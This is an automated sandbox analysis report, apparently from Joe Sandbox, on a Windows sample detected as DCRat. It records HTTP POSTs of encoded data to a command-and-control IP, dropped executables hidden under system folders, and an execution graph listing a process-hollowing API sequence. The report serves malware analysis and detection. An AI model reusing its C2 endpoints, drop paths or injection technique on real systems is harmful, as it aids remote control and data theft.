                                                            Dec 10, 2024 07:33:48.470046043 CET1048OUTData Raw: 5f 53 5c 59 58 59 53 5a 58 5f 51 55 5a 5d 58 53 56 52 58 59 56 59 50 58 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _S\YXYSZX_QUZ]XSVRXYVYPXPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!,&#!V4#&/23?+#(?>)%B'-$Z$!^" \)-
                                                            Dec 10, 2024 07:33:49.456485033 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:49.691329956 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.549972185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:49.932235956 CET279OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 1048
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:50.282543898 CET1048OUTData Raw: 5f 54 5c 5b 5d 5e 56 5e 58 5f 51 55 5a 5a 58 5d 56 51 58 5b 56 5a 50 58 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: _T\[]^V^X_QUZZX]VQX[VZPXPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/2=B$#6 X/*^$>;( #+W(("0$(!^" \)1
                                                            Dec 10, 2024 07:33:51.259231091 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:51.491430998 CET200INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 4;W_T0


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:01:31:45
                                                            Start date:10/12/2024
                                                            Path:C:\Users\user\Desktop\KyC6hVwU8Z.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\KyC6hVwU8Z.exe"
                                                            Imagebase:0x1b0000
                                                            File size:1'341'440 bytes
                                                            MD5 hash:A8C535490FEB18FDFF588D94C0D8A889
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:01:31:45
                                                            Start date:10/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:01:32:58
                                                            Start date:10/12/2024
                                                            Path:C:\Users\user\Desktop\KyC6hVwU8Z.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\KyC6hVwU8Z.exe"
                                                            Imagebase:0x1b0000
                                                            File size:1'341'440 bytes
                                                            MD5 hash:A8C535490FEB18FDFF588D94C0D8A889
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:01:32:58
                                                            Start date:10/12/2024
                                                            Path:C:\Users\user\Desktop\KyC6hVwU8Z.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\KyC6hVwU8Z.exe"
                                                            Imagebase:0x1b0000
                                                            File size:1'341'440 bytes
                                                            MD5 hash:A8C535490FEB18FDFF588D94C0D8A889
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:01:32:59
                                                            Start date:10/12/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 268
                                                            Imagebase:0x260000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:01:32:59
                                                            Start date:10/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe"
                                                            Imagebase:0x7ff64c400000
                                                            File size:18'944 bytes
                                                            MD5 hash:F3EDFF85DE5FD002692D54A04BCB1C09
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:01:32:59
                                                            Start date:10/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:01:32:59
                                                            Start date:10/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe"
                                                            Imagebase:0x50000
                                                            File size:691'200 bytes
                                                            MD5 hash:314420BAC969BCFB9510A0E8CC3686D6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000000.2794932818.0000000000052000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 74%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:01:33:01
                                                            Start date:10/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pfyxVLTZvp.bat"
                                                            Imagebase:0x7ff7d2aa0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:01:33:01
                                                            Start date:10/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:01:33:01
                                                            Start date:10/12/2024
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff6676d0000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:01:33:02
                                                            Start date:10/12/2024
                                                            Path:C:\Windows\System32\PING.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:ping -n 10 localhost
                                                            Imagebase:0x7ff6d08e0000
                                                            File size:22'528 bytes
                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:01:33:11
                                                            Start date:10/12/2024
                                                            Path:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe"
                                                            Imagebase:0xe0000
                                                            File size:691'200 bytes
                                                            MD5 hash:314420BAC969BCFB9510A0E8CC3686D6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.3302655841.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 74%, ReversingLabs
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:5.8%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:9.5%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:38
                                                              execution_graph 13228 2131b4 13229 2131ea 13228->13229 13230 213337 GetPEB 13229->13230 13231 213349 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 13229->13231 13234 2133e0 TerminateProcess 13229->13234 13230->13231 13231->13229 13232 2133f0 WriteProcessMemory 13231->13232 13233 213435 13232->13233 13235 213477 WriteProcessMemory Wow64SetThreadContext ResumeThread 13233->13235 13236 21343a WriteProcessMemory 13233->13236 13234->13229 13236->13233 15450 1fd930 15451 1fd93c ___scrt_is_nonwritable_in_current_image 15450->15451 15462 1fa8a1 EnterCriticalSection 15451->15462 15453 1fd943 15463 20202c 15453->15463 15460 1fda72 2 API calls 15461 1fd961 15460->15461 15482 1fd987 15461->15482 15462->15453 15464 202038 ___scrt_is_nonwritable_in_current_image 15463->15464 15465 202041 15464->15465 15466 202062 15464->15466 15467 1feb3e __dosmaperr 14 API calls 15465->15467 15485 1fa8a1 EnterCriticalSection 15466->15485 15469 202046 15467->15469 15470 1fa599 __fread_nolock 29 API calls 15469->15470 15474 1fd952 15470->15474 15471 20209a 15493 2020c1 15471->15493 15474->15461 15476 1fd9bc GetStartupInfoW 15474->15476 15475 20206e 15475->15471 15486 201f7c 15475->15486 15477 1fd9d9 15476->15477 15478 1fd95c 15476->15478 15477->15478 15479 20202c 30 API calls 15477->15479 15478->15460 15480 1fda01 15479->15480 15480->15478 15481 1fda31 GetFileType 15480->15481 15481->15480 15502 1fa8b8 LeaveCriticalSection 15482->15502 15484 1fd972 15485->15475 15487 1febee __dosmaperr 14 API calls 15486->15487 15488 201f8e 15487->15488 15492 201f9b 15488->15492 15496 1fcff1 15488->15496 15489 1fe38b ___free_lconv_mon 14 API calls 15491 201ff0 15489->15491 15491->15475 15492->15489 15501 1fa8b8 LeaveCriticalSection 15493->15501 15495 2020c8 15495->15474 15497 1fd1d5 __dosmaperr 5 API calls 15496->15497 15498 1fd00d 15497->15498 15499 1fd02b InitializeCriticalSectionAndSpinCount 15498->15499 15500 1fd016 15498->15500 15499->15500 15500->15488 15501->15495 15502->15484 15417 1e3820 15418 1e3871 15417->15418 15419 1e3bc7 15418->15419 15421 1e425a 15418->15421 15422 1f4d76 8 API calls std::_Throw_Cpp_error 15418->15422 15424 1e4296 15418->15424 15420 1f4de3 CatchGuardHandler 5 API calls 15419->15420 15423 1e448e 15420->15423 15425 1e44b0 std::_Throw_Cpp_error 30 API calls 15421->15425 15422->15418 15426 1fa5a9 std::_Throw_Cpp_error 29 API calls 15424->15426 15425->15424 15427 1e44a4 15426->15427 15542 1eb120 15545 1eb160 15542->15545 15543 1ebcf0 15544 1f4de3 CatchGuardHandler 5 API calls 15543->15544 15546 1ebcfb 15544->15546 15545->15543 15548 1ebd10 15545->15548 15556 1ec278 CatchIt 15548->15556 15549 1f27e5 15563 1f3fe0 15549->15563 15552 1f27e0 15554 1e6f10 30 API calls 15552->15554 15553 1f27fa 15555 1f4de3 CatchGuardHandler 5 API calls 15553->15555 15554->15549 15557 1f2809 15555->15557 15556->15549 15556->15552 15558 1e3820 31 API calls std::_Throw_Cpp_error 15556->15558 15559 1f2820 15556->15559 15557->15545 15558->15556 15560 1f2ce0 15559->15560 15561 1f4de3 CatchGuardHandler 5 API calls 15560->15561 15562 1f3fd0 15561->15562 15562->15556 15567 1f4030 _Deallocate 15563->15567 15564 1f4d3c 15565 1f4de3 CatchGuardHandler 5 API calls 15564->15565 15566 1f4d47 15565->15566 15566->15553 15567->15564 15568 1f4c0a 15567->15568 15569 1fa5a9 std::_Throw_Cpp_error 29 API calls 15568->15569 15570 1f4d56 15569->15570 15575 1f5b95 15570->15575 15576 1f4d6a 15575->15576 15577 1f5ba5 15575->15577 15579 1f5be9 15576->15579 15577->15576 15582 1f5e3a InitializeCriticalSectionEx 15577->15582 15583 1f5bfe 15579->15583 15582->15577 15584 1f5c0d 15583->15584 15585 1f5c14 15583->15585 15589 1f9fd9 15584->15589 15592 1f9f68 15585->15592 15588 1f4d74 15588->15553 15590 1f9f68 32 API calls 15589->15590 15591 1f9feb 15590->15591 15591->15588 15595 1fa1cb 15592->15595 15596 1fa1d7 ___scrt_is_nonwritable_in_current_image 15595->15596 15603 1fa8a1 EnterCriticalSection 15596->15603 15598 1fa1e5 15604 1f9fef 15598->15604 15600 1fa1f2 15614 1fa21a 15600->15614 15603->15598 15605 1fa00a 15604->15605 15606 1fa07d __dosmaperr 15604->15606 15605->15606 15607 1fa05d 15605->15607 15609 201712 32 API calls 15605->15609 15606->15600 15607->15606 15608 201712 32 API calls 15607->15608 15610 1fa073 15608->15610 15611 1fa053 15609->15611 15613 1fe38b ___free_lconv_mon 14 API calls 15610->15613 15612 1fe38b ___free_lconv_mon 14 API calls 15611->15612 15612->15607 15613->15606 15617 1fa8b8 LeaveCriticalSection 15614->15617 15616 1f9f99 15616->15588 15617->15616 15712 1f7850 15713 1fe767 ___scrt_uninitialize_crt 68 API calls 15712->15713 15714 1f7858 15713->15714 15722 1fec4b 15714->15722 15716 1f785d 15732 1fecf6 15716->15732 15719 1f7887 15720 1fe38b ___free_lconv_mon 14 API calls 15719->15720 15721 1f7892 15720->15721 15723 1fec57 ___scrt_is_nonwritable_in_current_image 15722->15723 15736 1fa8a1 EnterCriticalSection 15723->15736 15725 1fecce 15741 1feced 15725->15741 15727 1fec62 15727->15725 15728 1feca2 DeleteCriticalSection 15727->15728 15737 1fabe8 15727->15737 15731 1fe38b ___free_lconv_mon 14 API calls 15728->15731 15731->15727 15733 1fed0d 15732->15733 15734 1f786c DeleteCriticalSection 15732->15734 15733->15734 15735 1fe38b ___free_lconv_mon 14 API calls 15733->15735 15734->15716 15734->15719 15735->15734 15736->15727 15738 1fabfb __fread_nolock 15737->15738 15744 1faca6 15738->15744 15740 1fac07 __fread_nolock 15740->15727 15816 1fa8b8 LeaveCriticalSection 15741->15816 15743 1fecda 15743->15716 15745 1facb2 ___scrt_is_nonwritable_in_current_image 15744->15745 15746 1facdf 15745->15746 15747 1facbc 15745->15747 15748 1facd7 15746->15748 15755 1f774f EnterCriticalSection 15746->15755 15749 1fa742 __fread_nolock 29 API calls 15747->15749 15748->15740 15749->15748 15751 1facfd 15756 1fac18 15751->15756 15753 1fad0a 15770 1fad35 15753->15770 15755->15751 15757 1fac48 15756->15757 15758 1fac25 15756->15758 15760 1fe7d5 ___scrt_uninitialize_crt 64 API calls 15757->15760 15768 1fac40 15757->15768 15759 1fa742 __fread_nolock 29 API calls 15758->15759 15759->15768 15761 1fac60 15760->15761 15762 1fecf6 14 API calls 15761->15762 15763 1fac68 15762->15763 15764 1fff08 __fread_nolock 29 API calls 15763->15764 15765 1fac74 15764->15765 15773 2021f6 15765->15773 15768->15753 15769 1fe38b ___free_lconv_mon 14 API calls 15769->15768 15815 1f7763 LeaveCriticalSection 15770->15815 15772 1fad3b 15772->15748 15774 1fac7b 15773->15774 15775 20221f 15773->15775 15774->15768 15774->15769 15776 20226e 15775->15776 15778 202246 15775->15778 15777 1fa742 __fread_nolock 29 API calls 15776->15777 15777->15774 15780 202299 15778->15780 15781 2022a5 ___scrt_is_nonwritable_in_current_image 15780->15781 15788 2020ca EnterCriticalSection 15781->15788 15783 2022b3 15784 2022e4 15783->15784 15789 202156 15783->15789 15802 20231e 15784->15802 15788->15783 15790 201cdc __wsopen_s 29 API calls 15789->15790 15793 202166 15790->15793 15791 20216c 15805 201e59 15791->15805 15793->15791 15795 201cdc __wsopen_s 29 API calls 15793->15795 15801 20219e 15793->15801 15794 201cdc __wsopen_s 29 API calls 15796 2021aa CloseHandle 15794->15796 15798 202195 15795->15798 15796->15791 15799 2021b6 GetLastError 15796->15799 15797 2021c4 __wsopen_s 15797->15784 15800 201cdc __wsopen_s 29 API calls 15798->15800 15799->15791 15800->15801 15801->15791 15801->15794 15814 2020ed LeaveCriticalSection 15802->15814 15804 202307 15804->15774 15806 201e68 15805->15806 15807 201ecf 15805->15807 15806->15807 15813 201e92 __wsopen_s 15806->15813 15808 1feb3e __dosmaperr 14 API calls 15807->15808 15809 201ed4 15808->15809 15810 1feb51 __dosmaperr 14 API calls 15809->15810 15811 201ebf 15810->15811 15811->15797 15812 201eb9 SetStdHandle 15812->15811 15813->15811 15813->15812 15814->15804 15815->15772 15816->15743 13237 1f6342 13238 1f634e ___scrt_is_nonwritable_in_current_image 13237->13238 13263 1f5d0e 13238->13263 13240 1f6355 13241 1f64ae 13240->13241 13251 1f637f ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 13240->13251 13312 1f60a4 IsProcessorFeaturePresent 13241->13312 13243 1f64b5 13316 1f970f 13243->13316 13248 1f639e 13249 1f641f 13274 1fa286 13249->13274 13251->13248 13251->13249 13295 1f9759 13251->13295 13253 1f6425 13278 1d3450 13253->13278 13258 1f644a 13259 1f6453 13258->13259 13303 1f973b 13258->13303 13306 1f5d47 13259->13306 13264 1f5d17 13263->13264 13322 1f5e5d IsProcessorFeaturePresent 13264->13322 13268 1f5d28 13269 1f5d2c 13268->13269 13332 1f76b0 13268->13332 13269->13240 13272 1f5d43 13272->13240 13275 1fa28f 13274->13275 13276 1fa294 13274->13276 13404 1fa3af 13275->13404 13276->13253 13283 1d355a ___std_exception_copy _strlen 13278->13283 13279 1d64c8 13282 1d6fc0 std::_Throw_Cpp_error 29 API calls 13279->13282 13286 1d64d4 13282->13286 13283->13279 13287 1fabe8 69 API calls 13283->13287 13288 1d9f40 31 API calls std::_Throw_Cpp_error 13283->13288 13293 1fad3d 92 API calls 13283->13293 14315 1c4e00 13283->14315 14321 1d0350 13283->14321 14335 1fb167 13283->14335 14339 1fb48a 13283->14339 14343 1faf56 13283->14343 14346 1c5e50 13283->14346 14356 1d6fc0 13283->14356 13289 1f4de3 CatchGuardHandler 5 API calls 13286->13289 13287->13283 13288->13283 13290 1d6f9c 13289->13290 13301 1f6049 GetModuleHandleW 13290->13301 13293->13283 13296 1f976f ___scrt_is_nonwritable_in_current_image __dosmaperr 13295->13296 13296->13249 13297 1fd34a _unexpected 39 API calls 13296->13297 13300 1fbb8c 13297->13300 13298 1fab99 CallUnexpected 39 API calls 13299 1fbbb6 13298->13299 13300->13298 13302 1f6055 13301->13302 13302->13243 13302->13258 15270 1f985a 13303->15270 13307 1f5d53 13306->13307 13308 1f5d69 13307->13308 15341 1f76c2 13307->15341 13308->13248 13310 1f5d61 13311 1f6d1a ___scrt_uninitialize_crt 7 API calls 13310->13311 13311->13308 13313 1f60ba __fread_nolock __CreateFrameInfo 13312->13313 13314 1f6165 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13313->13314 13315 1f61b0 __CreateFrameInfo 13314->13315 13315->13243 13317 1f985a __CreateFrameInfo 21 API calls 13316->13317 13318 1f64bb 13317->13318 13319 1f9725 13318->13319 13320 1f985a __CreateFrameInfo 21 API calls 13319->13320 13321 1f64c3 13320->13321 13323 1f5d23 13322->13323 13324 1f6cfb 13323->13324 13341 1fcae6 13324->13341 13327 1f6d04 13327->13268 13329 1f6d0c 13330 1f6d17 13329->13330 13355 1fcb22 13329->13355 13330->13268 13395 1fe3c5 13332->13395 13335 1f6d1a 13336 1f6d2d 13335->13336 13337 1f6d23 13335->13337 13336->13269 13338 1fbbea ___vcrt_uninitialize_ptd 6 API calls 13337->13338 13339 1f6d28 13338->13339 13340 1fcb22 ___vcrt_uninitialize_locks DeleteCriticalSection 13339->13340 13340->13336 13342 1fcaef 13341->13342 13344 1fcb18 13342->13344 13345 1f6d00 13342->13345 13359 203a0a 13342->13359 13346 1fcb22 ___vcrt_uninitialize_locks DeleteCriticalSection 13344->13346 13345->13327 13347 1fbbb7 13345->13347 13346->13345 13376 20391b 13347->13376 13351 1fbbe7 13351->13329 13354 1fbbcc 13354->13329 13356 1fcb4c 13355->13356 13357 1fcb2d 13355->13357 13356->13327 13358 1fcb37 DeleteCriticalSection 13357->13358 13358->13356 13358->13358 13364 203a9c 13359->13364 13362 203a42 InitializeCriticalSectionAndSpinCount 13363 203a2d 13362->13363 13363->13342 13365 203a24 13364->13365 13366 203abd 13364->13366 13365->13362 13365->13363 13366->13365 13367 203b25 GetProcAddress 13366->13367 13369 203b16 13366->13369 13371 203a51 LoadLibraryExW 13366->13371 13367->13365 13369->13367 13370 203b1e FreeLibrary 13369->13370 13370->13367 13372 203a68 GetLastError 13371->13372 13373 203a98 13371->13373 13372->13373 13374 203a73 ___vcrt_InitializeCriticalSectionEx 13372->13374 13373->13366 13374->13373 13375 203a89 LoadLibraryExW 13374->13375 13375->13366 13377 203a9c ___vcrt_InitializeCriticalSectionEx 5 API calls 13376->13377 13378 203935 13377->13378 13379 20394e TlsAlloc 13378->13379 13380 1fbbc1 13378->13380 13380->13354 13381 2039cc 13380->13381 13382 203a9c ___vcrt_InitializeCriticalSectionEx 5 API calls 13381->13382 13383 2039e6 13382->13383 13384 203a01 TlsSetValue 13383->13384 13385 1fbbda 13383->13385 13384->13385 13385->13351 13386 1fbbea 13385->13386 13387 1fbbf4 13386->13387 13388 1fbbfa 13386->13388 13390 203956 13387->13390 13388->13354 13391 203a9c ___vcrt_InitializeCriticalSectionEx 5 API calls 13390->13391 13392 203970 13391->13392 13393 203988 TlsFree 13392->13393 13394 20397c 13392->13394 13393->13394 13394->13388 13396 1fe3d5 13395->13396 13397 1f5d35 13395->13397 13396->13397 13399 1fda72 13396->13399 13397->13272 13397->13335 13400 1fda79 13399->13400 13401 1fdabc GetStdHandle 13400->13401 13402 1fdb1e 13400->13402 13403 1fdacf GetFileType 13400->13403 13401->13400 13402->13396 13403->13400 13405 1fa3b8 13404->13405 13408 1fa3ce 13404->13408 13405->13408 13410 1fa2f0 13405->13410 13407 1fa3c5 13407->13408 13427 1fa4bd 13407->13427 13408->13276 13411 1fa2fc 13410->13411 13412 1fa2f9 13410->13412 13436 1fdb40 13411->13436 13412->13407 13417 1fa30d 13463 1fe38b 13417->13463 13418 1fa319 13469 1fa3db 13418->13469 13423 1fe38b ___free_lconv_mon 14 API calls 13424 1fa33d 13423->13424 13425 1fe38b ___free_lconv_mon 14 API calls 13424->13425 13426 1fa343 13425->13426 13426->13407 13428 1fa52e 13427->13428 13431 1fa4cc 13427->13431 13428->13408 13429 20177f WideCharToMultiByte __wsopen_s 13429->13431 13430 1febee __dosmaperr 14 API calls 13430->13431 13431->13428 13431->13429 13431->13430 13433 1fa532 13431->13433 13435 1fe38b ___free_lconv_mon 14 API calls 13431->13435 14034 201952 13431->14034 13432 1fe38b ___free_lconv_mon 14 API calls 13432->13428 13433->13432 13435->13431 13437 1fdb49 13436->13437 13438 1fa302 13436->13438 13491 1fd405 13437->13491 13442 20187b GetEnvironmentStringsW 13438->13442 13443 201893 13442->13443 13444 1fa307 13442->13444 13445 20177f __wsopen_s WideCharToMultiByte 13443->13445 13444->13417 13444->13418 13446 2018b0 13445->13446 13447 2018c5 13446->13447 13448 2018ba FreeEnvironmentStringsW 13446->13448 13449 1fed36 __strnicoll 15 API calls 13447->13449 13448->13444 13450 2018cc 13449->13450 13451 2018d4 13450->13451 13452 2018e5 13450->13452 13453 1fe38b ___free_lconv_mon 14 API calls 13451->13453 13454 20177f __wsopen_s WideCharToMultiByte 13452->13454 13455 2018d9 FreeEnvironmentStringsW 13453->13455 13456 2018f5 13454->13456 13455->13444 13457 201904 13456->13457 13458 2018fc 13456->13458 13459 1fe38b ___free_lconv_mon 14 API calls 13457->13459 13460 1fe38b ___free_lconv_mon 14 API calls 13458->13460 13461 201902 FreeEnvironmentStringsW 13459->13461 13460->13461 13461->13444 13464 1fe396 HeapFree 13463->13464 13468 1fa313 13463->13468 13465 1fe3ab GetLastError 13464->13465 13464->13468 13466 1fe3b8 __dosmaperr 13465->13466 13467 1feb3e __dosmaperr 12 API calls 13466->13467 13467->13468 13468->13407 13470 1fa3f0 13469->13470 13471 1febee __dosmaperr 14 API calls 13470->13471 13472 1fa417 13471->13472 13473 1fa41f 13472->13473 13482 1fa429 13472->13482 13474 1fe38b ___free_lconv_mon 14 API calls 13473->13474 13490 1fa320 13474->13490 13475 1fa486 13476 1fe38b ___free_lconv_mon 14 API calls 13475->13476 13476->13490 13477 1febee __dosmaperr 14 API calls 13477->13482 13478 1fa495 14024 1fa380 13478->14024 13482->13475 13482->13477 13482->13478 13484 1fa4b0 13482->13484 13486 1fe38b ___free_lconv_mon 14 API calls 13482->13486 14015 1fca8c 13482->14015 13483 1fe38b ___free_lconv_mon 14 API calls 13485 1fa4a2 13483->13485 14030 1fa5c6 IsProcessorFeaturePresent 13484->14030 13488 1fe38b ___free_lconv_mon 14 API calls 13485->13488 13486->13482 13488->13490 13489 1fa4bc 13490->13423 13492 1fd410 13491->13492 13495 1fd416 13491->13495 13541 1fcf70 13492->13541 13497 1fd41c 13495->13497 13546 1fcfaf 13495->13546 13501 1fd421 13497->13501 13563 1fab99 13497->13563 13498 1fd434 13551 1febee 13498->13551 13519 1fdf83 13501->13519 13504 1fd45d 13507 1fcfaf __dosmaperr 6 API calls 13504->13507 13505 1fd448 13506 1fcfaf __dosmaperr 6 API calls 13505->13506 13508 1fd454 13506->13508 13509 1fd469 13507->13509 13512 1fe38b ___free_lconv_mon 14 API calls 13508->13512 13510 1fd46d 13509->13510 13511 1fd47c 13509->13511 13513 1fcfaf __dosmaperr 6 API calls 13510->13513 13558 1fd65c 13511->13558 13516 1fd45a 13512->13516 13513->13508 13516->13497 13517 